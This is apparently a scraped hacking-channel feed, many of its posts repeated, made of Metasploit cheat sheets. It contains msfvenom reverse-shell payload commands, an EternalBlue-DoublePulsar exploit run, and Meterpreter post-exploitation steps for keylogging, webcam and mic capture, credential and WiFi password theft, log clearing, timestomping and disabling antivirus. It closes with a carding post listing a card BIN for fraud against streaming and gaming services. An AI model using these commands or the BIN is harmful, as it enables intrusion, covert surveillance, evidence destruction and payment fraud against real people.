▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑METASPLOIT
#FastTips
Search for exploits using Metasploit GitHub framework source code:
*https://github.com/rapid7/metasploit-framework*
Translate them for use on OSCP LAB or EXAM.
Metasploit
MetaSploit requires Postfresql
Start metasploit
Show the basic information for a module
Run the module
Show all hosts discovered in the MSF database
https://www.youtube.com/watch?v=4OHLor9VaRI
1. First step is to configure the Kali to work with wine 32bit
2. Download the exploit repostory
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
3. Move the exploit to /usr /share /metasploit-framework /modules /exploits /windows /smb
4. Start metasploit console (spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.)
####Experimenting with Meterpreter####
Get system information from Meterpreter Shell
multi/handler to accept an incoming reverse_https_meterpreter
Building Your Own MSF Module
Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)
-
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑METASPLOIT
#FastTips
Search for exploits using Metasploit GitHub framework source code:
*https://github.com/rapid7/metasploit-framework*
Translate them for use on OSCP LAB or EXAM.
Metasploit
MetaSploit requires Postfresql
systemctl start postgresql
To enable Postgresql on startupsystemctl enable postgresql
MSF SyntaxStart metasploit
msfconsole
msfconsole -q
Show help for commandshow -h
Show Auxiliary modulesshow auxiliary
Use a moduleuse auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/http/webdav_scanner
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/ftp/ftp_login
use exploit/windows/pop3/seattlelab_passShow the basic information for a module
info
Show the configuration parameters for a moduleshow options
Set options for a moduleset RHOSTS 192.168.1.1-254
set THREADS 10Run the module
run
Execute an Exploitexploit
Search for a modulesearch type:auxiliary login
Metasploit Database AccessShow all hosts discovered in the MSF database
hosts
Scan for hosts and store them in the MSF databasedb_nmap
Search machines for specific ports in MSF databaseservices -p 443
Leverage MSF database to scan SMB ports (auto-completed rhosts)services -p 443 --rhosts
You may find some boxes that are vulnerable to MS17-010 (AKA. EternalBlue). Although, not offically part of the indended course, this exploit can be leveraged to gain SYSTEM level access to a Windows box. I have never had much luck using the built in Metasploit EternalBlue module. I found that the elevenpaths version works much more relabily. Here are the instructions to install it taken from the following YouTube video:https://www.youtube.com/watch?v=4OHLor9VaRI
1. First step is to configure the Kali to work with wine 32bit
dpkg --add-architecture i386 && apt-get update && apt-get install wine32
rm -r ~/.wine
wine cmd.exe
exit2. Download the exploit repostory
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
3. Move the exploit to /usr /share /metasploit-framework /modules /exploits /windows /smb
4. Start metasploit console (spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.)
use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10
RHOST => 10.11.1.73
msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe
PROCESSINJECT => spoolsv.exe
msf exploit(eternalblue_doublepulsar) > run####Experimenting with Meterpreter####
Get system information from Meterpreter Shell
sysinfo
Get user id from Meterpreter Shellgetuid
Search for a filesearch -f *pass*.txt
Upload a fileupload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec
Download a filedownload c:\\Windows\\system32\\calc.exe /tmp/calc.exe
Invoke a command shell from Meterpreter Shellshell
Exit the meterpreter shellexit
Metasploit Exploit Multi Handlermulti/handler to accept an incoming reverse_https_meterpreter
payload
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST $ip
set LPORT 443
exploit
[*] Started HTTPS reverse handler on https://$ip:443/Building Your Own MSF Module
mkdir -p ~/.msf4/modules/exploits/linux/misc
cd ~/.msf4/modules/exploits/linux/misc
cp
/usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb
./crossfire.rb
nano crossfire.rbPost Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)
-
download Download a file or directoryupload Upload a file or directoryportfwd Forward a local port to a remote serviceroute View and modify the routing tablekeyscan_start Start capturing keystrokeskeyscan_stop Stop capturing keystrokesscreenshot Grab a screenshot of the interactive desktoprecord_mic Record audio from the default microphone for X secondswebcam_snap Take a snapshot from the specified webcamgetsystem Attempt to elevate your privilege to that of local system.hashdump Dumps the contents of the SAM database▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
GitHub
GitHub - rapid7/metasploit-framework: Metasploit Framework
Metasploit Framework. Contribute to rapid7/metasploit-framework development by creating an account on GitHub.
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑FOR BEGINERS :
+ Creating Metasploit Payloads
List payloads
msfvenom -l
Binaries
Linux
msfvenom -p linux/x86/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Mac
msfvenom -p osx/x86/shellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
Web Payloads
PHP
msfvenom -p php/meterpreterreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
JSP
msfvenom -p java/jspshellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
WAR
msfvenom -p java/jspshellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
Scripting Payloads
Python
msfvenom -p cmd/unix/reversepython LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
Bash
msfvenom -p cmd/unix/reversebash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverseperl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
Shellcode
For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Windows Based Shellcode
msfvenom -p windows/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Mac Based Shellcode
msfvenom -p osx/x86/shellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Handlers
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z
Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘
ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑FOR BEGINERS :
+ Creating Metasploit Payloads
List payloads
msfvenom -l
Binaries
Linux
msfvenom -p linux/x86/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Mac
msfvenom -p osx/x86/shellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
Web Payloads
PHP
msfvenom -p php/meterpreterreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
JSP
msfvenom -p java/jspshellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
WAR
msfvenom -p java/jspshellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
Scripting Payloads
Python
msfvenom -p cmd/unix/reversepython LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
Bash
msfvenom -p cmd/unix/reversebash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverseperl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
Shellcode
For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Windows Based Shellcode
msfvenom -p windows/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Mac Based Shellcode
msfvenom -p osx/x86/shellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Handlers
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z
Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘
ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑METASPLOIT
#FastTips
Search for exploits using Metasploit GitHub framework source code:
*https://github.com/rapid7/metasploit-framework*
Translate them for use on OSCP LAB or EXAM.
Metasploit
MetaSploit requires Postfresql
Start metasploit
Show the basic information for a module
Run the module
Show all hosts discovered in the MSF database
https://www.youtube.com/watch?v=4OHLor9VaRI
1. First step is to configure the Kali to work with wine 32bit
2. Download the exploit repostory
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
3. Move the exploit to /usr /share /metasploit-framework /modules /exploits /windows /smb
4. Start metasploit console (spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.)
####Experimenting with Meterpreter####
Get system information from Meterpreter Shell
multi/handler to accept an incoming reverse_https_meterpreter
Building Your Own MSF Module
Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)
-
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑METASPLOIT
#FastTips
Search for exploits using Metasploit GitHub framework source code:
*https://github.com/rapid7/metasploit-framework*
Translate them for use on OSCP LAB or EXAM.
Metasploit
MetaSploit requires Postfresql
systemctl start postgresql
To enable Postgresql on startupsystemctl enable postgresql
MSF SyntaxStart metasploit
msfconsole
msfconsole -q
Show help for commandshow -h
Show Auxiliary modulesshow auxiliary
Use a moduleuse auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/http/webdav_scanner
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/ftp/ftp_login
use exploit/windows/pop3/seattlelab_passShow the basic information for a module
info
Show the configuration parameters for a moduleshow options
Set options for a moduleset RHOSTS 192.168.1.1-254
set THREADS 10Run the module
run
Execute an Exploitexploit
Search for a modulesearch type:auxiliary login
Metasploit Database AccessShow all hosts discovered in the MSF database
hosts
Scan for hosts and store them in the MSF databasedb_nmap
Search machines for specific ports in MSF databaseservices -p 443
Leverage MSF database to scan SMB ports (auto-completed rhosts)services -p 443 --rhosts
You may find some boxes that are vulnerable to MS17-010 (AKA. EternalBlue). Although, not offically part of the indended course, this exploit can be leveraged to gain SYSTEM level access to a Windows box. I have never had much luck using the built in Metasploit EternalBlue module. I found that the elevenpaths version works much more relabily. Here are the instructions to install it taken from the following YouTube video:https://www.youtube.com/watch?v=4OHLor9VaRI
1. First step is to configure the Kali to work with wine 32bit
dpkg --add-architecture i386 && apt-get update && apt-get install wine32
rm -r ~/.wine
wine cmd.exe
exit2. Download the exploit repostory
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
3. Move the exploit to /usr /share /metasploit-framework /modules /exploits /windows /smb
4. Start metasploit console (spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.)
use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10
RHOST => 10.11.1.73
msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe
PROCESSINJECT => spoolsv.exe
msf exploit(eternalblue_doublepulsar) > run####Experimenting with Meterpreter####
Get system information from Meterpreter Shell
sysinfo
Get user id from Meterpreter Shellgetuid
Search for a filesearch -f *pass*.txt
Upload a fileupload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec
Download a filedownload c:\\Windows\\system32\\calc.exe /tmp/calc.exe
Invoke a command shell from Meterpreter Shellshell
Exit the meterpreter shellexit
Metasploit Exploit Multi Handlermulti/handler to accept an incoming reverse_https_meterpreter
payload
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST $ip
set LPORT 443
exploit
[*] Started HTTPS reverse handler on https://$ip:443/Building Your Own MSF Module
mkdir -p ~/.msf4/modules/exploits/linux/misc
cd ~/.msf4/modules/exploits/linux/misc
cp
/usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb
./crossfire.rb
nano crossfire.rbPost Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)
-
download Download a file or directoryupload Upload a file or directoryportfwd Forward a local port to a remote serviceroute View and modify the routing tablekeyscan_start Start capturing keystrokeskeyscan_stop Stop capturing keystrokesscreenshot Grab a screenshot of the interactive desktoprecord_mic Record audio from the default microphone for X secondswebcam_snap Take a snapshot from the specified webcamgetsystem Attempt to elevate your privilege to that of local system.hashdump Dumps the contents of the SAM database▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
GitHub
GitHub - rapid7/metasploit-framework: Metasploit Framework
Metasploit Framework. Contribute to rapid7/metasploit-framework development by creating an account on GitHub.
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Materpreter Study Notes
# Baisc system commands
background # placed in the background of the current session
Sessions # Sessions to see -h help
sessions -i <ID value> # kill -k session into the session
bgrun / RUN # implementation of the existing module, double-click the tab enter the run, has been listed Some scripts
info # View existing module information
getuid # View current user identity
getprivs # View current user permissions
getpid # Get current process ID (PID)
sysinfo # View target machine system information
irb # Open ruby terminal
ps # View is running Process
kill <PID value> # Kill the specified PID process
idletime # View target idle time
reboot / shutdown # Restart / Shutdown
shell # Enter target cmd shell
ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Materpreter Study Notes
# Baisc system commands
background # placed in the background of the current session
Sessions # Sessions to see -h help
sessions -i <ID value> # kill -k session into the session
bgrun / RUN # implementation of the existing module, double-click the tab enter the run, has been listed Some scripts
info # View existing module information
getuid # View current user identity
getprivs # View current user permissions
getpid # Get current process ID (PID)
sysinfo # View target machine system information
irb # Open ruby terminal
ps # View is running Process
kill <PID value> # Kill the specified PID process
idletime # View target idle time
reboot / shutdown # Restart / Shutdown
shell # Enter target cmd shell
ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Bypassing Application Whitelisting By Using dnx.exe.pdf
226.5 KB
The Most requested hacking tutorial :
Bypassing Application Whitelisting By Using dnx.exe
Bypassing Application Whitelisting By Using dnx.exe
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Helpful Commands for any hacker:
# Uictl switch keyboard / mouse
Uictl [ enable/disable ] [ keyboard/mouse/all ] # enable or disable keyboard/mouse
uictl disable mouse # disable mouse
uictl disable keyboard # disable keyboard
# Execute executable file
the Execute # executable file on the target machine
execute -H -i -f cmd.exe create a new process cmd.exe #, -H invisible, -i interactive
execute -H -m -d notepad.exe -f payload.exe - a "-o hack.txt"
# -d Process name displayed during execution of the target host (for masquerading) -m Direct execution from memory
"-o hack.txt" is the running parameter of payload.exe
# Migrate process migration
Getpid # Get the current process's pid
ps # View the current active process
migrate <pid value> # Migrate the Meterpreter session to the specified pid value in the process
kill <pid value> #kill the process
# Clearav clear log
Clearav # Clear application logs, system logs, security logs in windows
# Timestomp forged timestamp
Timestomp C: \\ -h
View help timestomp -v C: \\ 2 .txt
View timestamp timestomp C: \\ 2 .txt -f C: \\ 1 .txt #Copy the timestamp of 1.txt Give
2. txt timestomp c: \\ test \\ 22 .txt -z "03/10/2019 11:55:55" -v # Set the four properties to uniform time
# Portfwd port forwarding
Portfwd add -l 1111 -p 3389 -r 127 .0.0.1 #Forward the 3389 port of the target machine to the local port 1111
rdesktop 127 .0.0.1:1111 # Need to enter the username and password to connect
rdesktop -u Administrator -p 123 127 .0.0.1:1111 # -u username -p password
# Autoroute add route
run autoroute -h # View help
run get_local_subnets # View target intranet segment address
run autoroute -s 192 .168.183.0/24 # Add target network segment route
run autoroute -p # View added route
run post/windows/gather/arp_scanner RHOSTS = 192 .168.183.0/24
run auxiliary/scanner/portscan/tcp RHOSTS = 192 .168.183.146 PORTS = 3389
# Socks agent
Reference: https://www.freebuf.com/articles/network/125278.html
use auxiliary/server/socks4a
set srvhost 127 .0.0.1
set srvport 2000
run
ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Helpful Commands for any hacker:
# Uictl switch keyboard / mouse
Uictl [ enable/disable ] [ keyboard/mouse/all ] # enable or disable keyboard/mouse
uictl disable mouse # disable mouse
uictl disable keyboard # disable keyboard
# Execute executable file
the Execute # executable file on the target machine
execute -H -i -f cmd.exe create a new process cmd.exe #, -H invisible, -i interactive
execute -H -m -d notepad.exe -f payload.exe - a "-o hack.txt"
# -d Process name displayed during execution of the target host (for masquerading) -m Direct execution from memory
"-o hack.txt" is the running parameter of payload.exe
# Migrate process migration
Getpid # Get the current process's pid
ps # View the current active process
migrate <pid value> # Migrate the Meterpreter session to the specified pid value in the process
kill <pid value> #kill the process
# Clearav clear log
Clearav # Clear application logs, system logs, security logs in windows
# Timestomp forged timestamp
Timestomp C: \\ -h
View help timestomp -v C: \\ 2 .txt
View timestamp timestomp C: \\ 2 .txt -f C: \\ 1 .txt #Copy the timestamp of 1.txt Give
2. txt timestomp c: \\ test \\ 22 .txt -z "03/10/2019 11:55:55" -v # Set the four properties to uniform time
# Portfwd port forwarding
Portfwd add -l 1111 -p 3389 -r 127 .0.0.1 #Forward the 3389 port of the target machine to the local port 1111
rdesktop 127 .0.0.1:1111 # Need to enter the username and password to connect
rdesktop -u Administrator -p 123 127 .0.0.1:1111 # -u username -p password
# Autoroute add route
run autoroute -h # View help
run get_local_subnets # View target intranet segment address
run autoroute -s 192 .168.183.0/24 # Add target network segment route
run autoroute -p # View added route
run post/windows/gather/arp_scanner RHOSTS = 192 .168.183.0/24
run auxiliary/scanner/portscan/tcp RHOSTS = 192 .168.183.146 PORTS = 3389
# Socks agent
Reference: https://www.freebuf.com/articles/network/125278.html
use auxiliary/server/socks4a
set srvhost 127 .0.0.1
set srvport 2000
run
ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Freebuf
图解Meterpreter实现网络穿透的方法 - FreeBuf网络安全行业门户
本文我们将通过示例分析攻击者是如何运用各种方法进行网络穿透的。
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑# Common script :
Run arpscanner -r 192 .168.183.1/24 # Use arp for surviving host scan
run winenum # automate some detection scripts
run credcollect # get user hash
run domainlistgen # get domain management account list
run post/multi/gather/env # get User environment variable
run post/windows/gather/enumloggedonusers -c # List current login user
run post/linux/gather/checkvm # virtual machine
run post/windows/gather/checkvm # virtual machine
run post/windows/gather/ Forensics/enumdrives # View memory information
run post/windows/gather/enumapplications # Get installation
software information
run post/windows/gather/dumplinks # Get recently accessed documents, link information
run post/windows/gather/enumie # Get IE cache
run post/windows/gather/enumfirefox # Get firefox cache
run post/windows/gather/enumchrome # Get Chrome cache
run post/multi/recon/localexploitsuggester # Get local privilege vulnerability
run post/windows/gather/enumpatches # Get patch information
run post/windows/gather/enumdomain # Find domain control
run post/windows/gather/enumsnmp # Get snmp community name
run post/windows/gather/credentials/vnc # Get vnc password
run post/windows/wlan/ Wlanprofile # Used to read the target host WiFi password
run post/multi/gather/wlangeolocate # Based on wlan, the location confirmation file is located at /root/.msf4/loot
run post/windows/manage/killav close antivirus software
ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑# Common script :
Run arpscanner -r 192 .168.183.1/24 # Use arp for surviving host scan
run winenum # automate some detection scripts
run credcollect # get user hash
run domainlistgen # get domain management account list
run post/multi/gather/env # get User environment variable
run post/windows/gather/enumloggedonusers -c # List current login user
run post/linux/gather/checkvm # virtual machine
run post/windows/gather/checkvm # virtual machine
run post/windows/gather/ Forensics/enumdrives # View memory information
run post/windows/gather/enumapplications # Get installation
software information
run post/windows/gather/dumplinks # Get recently accessed documents, link information
run post/windows/gather/enumie # Get IE cache
run post/windows/gather/enumfirefox # Get firefox cache
run post/windows/gather/enumchrome # Get Chrome cache
run post/multi/recon/localexploitsuggester # Get local privilege vulnerability
run post/windows/gather/enumpatches # Get patch information
run post/windows/gather/enumdomain # Find domain control
run post/windows/gather/enumsnmp # Get snmp community name
run post/windows/gather/credentials/vnc # Get vnc password
run post/windows/wlan/ Wlanprofile # Used to read the target host WiFi password
run post/multi/gather/wlangeolocate # Based on wlan, the location confirmation file is located at /root/.msf4/loot
run post/windows/manage/killav close antivirus software
ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Crack-Sniffer-Keylogger-webcam modules :
# Common crack module
Auxiliary/scanner/mssql/mssqllogin
Auxiliary/scanner/ftp/ftplogin
Auxiliary/scanner/ssh/sshlogin
Auxiliary/scanner/telnet/telnetlogin
Auxiliary/scanner/smb/smblogin
Auxiliary/scanner/mssql/mssqllogin
Auxiliary/scanner/mysql/mysqllogin
Auxiliary/scanner/oracle/oraclelogin
Auxiliary/scanner/postgres/postgreslogin
Auxiliary/scanner/vnc/vnclogin
Auxiliary/scanner/pcanywhere/pcanywherelogin
Auxiliary/scanner/snmp/snmplogin
Auxiliary/scanner/ftp/anonymous
# Keylogger
Keyscanstart # Start key record
keyscandump # Export record data
keyscanstop # End key record
# Sniffer capture package
Use sniffer
Snifferinterfaces # View NIC
snifferstart 1 # Select NIC 1 to start capturing
snifferstats 1 # View NIC 1 status
snifferdump 1 /tmp/wlan1.pcap # Export pcap packet
snifferstop 1 # Stop NIC 1 capture
snifferrelease 1 # Release NIC 1 traffic
# Webcam
recordmic # audio recording
webcamchat # open a video chat (the other party pop)
webcamlist # view camera
webcamsnap # through the camera to take pictures
webcamstream # open by video surveillance cameras (to monitor ≈ live as a web page)
# Screen capture
Screenshot # Screenshots
use espia # Use espia module
screengrab # screenshot
ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Crack-Sniffer-Keylogger-webcam modules :
# Common crack module
Auxiliary/scanner/mssql/mssqllogin
Auxiliary/scanner/ftp/ftplogin
Auxiliary/scanner/ssh/sshlogin
Auxiliary/scanner/telnet/telnetlogin
Auxiliary/scanner/smb/smblogin
Auxiliary/scanner/mssql/mssqllogin
Auxiliary/scanner/mysql/mysqllogin
Auxiliary/scanner/oracle/oraclelogin
Auxiliary/scanner/postgres/postgreslogin
Auxiliary/scanner/vnc/vnclogin
Auxiliary/scanner/pcanywhere/pcanywherelogin
Auxiliary/scanner/snmp/snmplogin
Auxiliary/scanner/ftp/anonymous
# Keylogger
Keyscanstart # Start key record
keyscandump # Export record data
keyscanstop # End key record
# Sniffer capture package
Use sniffer
Snifferinterfaces # View NIC
snifferstart 1 # Select NIC 1 to start capturing
snifferstats 1 # View NIC 1 status
snifferdump 1 /tmp/wlan1.pcap # Export pcap packet
snifferstop 1 # Stop NIC 1 capture
snifferrelease 1 # Release NIC 1 traffic
# Webcam
recordmic # audio recording
webcamchat # open a video chat (the other party pop)
webcamlist # view camera
webcamsnap # through the camera to take pictures
webcamstream # open by video surveillance cameras (to monitor ≈ live as a web page)
# Screen capture
Screenshot # Screenshots
use espia # Use espia module
screengrab # screenshot
ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑The latest variant of the eternal blue downloader restarts the EXE file attack, and the new variant has infected 15,000 servers :
> A new variant of the eternal blue downloader Trojan. This variant uses Python to package EXE executable files for attacks. The organization used a similar method at the end of 2018. Tencent security big data monitoring data shows that the latest variant of the eternal blue downloader quickly spread after it appeared. It has infected about 15,000 servers. The poisoning system is finally used to download and run the Monero mining Trojan.
> In the process of continuous evolution and update, the eternal blue downloader Trojan has gradually switched the EXE attack mode to use Powershell scripts to achieve fileless attacks. After its functions became more and more huge, the gang of gangsters again added the code of exploiting the eternal blue vulnerability attack and mssql blasting attack to the EXE Trojan, and shielded the relevant code in Powershell.
> The system trapped by this variant attack will download if.bin, download and run an EXE attack module named by a random string for large-scale vulnerability scanning and attack propagation, and will also download the Monero coin mining Trojan to occupy a large amount of CPU resources on the server Mining will cause severe productivity losses to the injured enterprises.
enjoy❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑The latest variant of the eternal blue downloader restarts the EXE file attack, and the new variant has infected 15,000 servers :
> A new variant of the eternal blue downloader Trojan. This variant uses Python to package EXE executable files for attacks. The organization used a similar method at the end of 2018. Tencent security big data monitoring data shows that the latest variant of the eternal blue downloader quickly spread after it appeared. It has infected about 15,000 servers. The poisoning system is finally used to download and run the Monero mining Trojan.
> In the process of continuous evolution and update, the eternal blue downloader Trojan has gradually switched the EXE attack mode to use Powershell scripts to achieve fileless attacks. After its functions became more and more huge, the gang of gangsters again added the code of exploiting the eternal blue vulnerability attack and mssql blasting attack to the EXE Trojan, and shielded the relevant code in Powershell.
> The system trapped by this variant attack will download if.bin, download and run an EXE attack module named by a random string for large-scale vulnerability scanning and attack propagation, and will also download the Monero coin mining Trojan to occupy a large amount of CPU resources on the server Mining will cause severe productivity losses to the injured enterprises.
enjoy❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Best Boot - Repair access to operating systems
GRUB reinstall, MBR restore, UEFI, SecureBoot, RAID, LVM, Wubi, filesystem repair... :
Download : https://sourceforge.net/p/boot-repair/home
#FastTips
GRUB reinstall, MBR restore, UEFI, SecureBoot, RAID, LVM, Wubi, filesystem repair... :
Download : https://sourceforge.net/p/boot-repair/home
#FastTips
GitHub Enterprise Remote Code Execution.pdf
208 KB
GitHub Enterprise Remote Code Execution
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑WHAt Network Tools should you choose ?
#FastTips
> The most advanced network monitoring tools can also perform the following 5 functions :
1. Network and application monitoring
2. Network problem analysis
3. Application data and stream interception analysis
4. Virtualization and operating system problem detection
5. Root cause analysis
Different network performance monitoring vendors have different granularities in performing these tasks. Moreover, the more precise the task, the more complicated it will be when it is implemented and managed. Therefore, we must accurately understand the needs of our organization, and then properly balance the granularity and complexity.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑WHAt Network Tools should you choose ?
#FastTips
> The most advanced network monitoring tools can also perform the following 5 functions :
1. Network and application monitoring
2. Network problem analysis
3. Application data and stream interception analysis
4. Virtualization and operating system problem detection
5. Root cause analysis
Different network performance monitoring vendors have different granularities in performing these tasks. Moreover, the more precise the task, the more complicated it will be when it is implemented and managed. Therefore, we must accurately understand the needs of our organization, and then properly balance the granularity and complexity.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
BIN Multifunctional:(PUBG)
BIN: 431732027035xxxx
DATE: 02/23
CVV: RANDOM
IP: USA 🇺🇸
Working For :
Pubg Uc
Prime Video
PlayStore
Spotify (Paid & Auto Renew)
Netflix
Ding (Charged Card Needed)
Note: Lives CVV Needed.
- Working on more Sites.
(Only verified, not created by us)
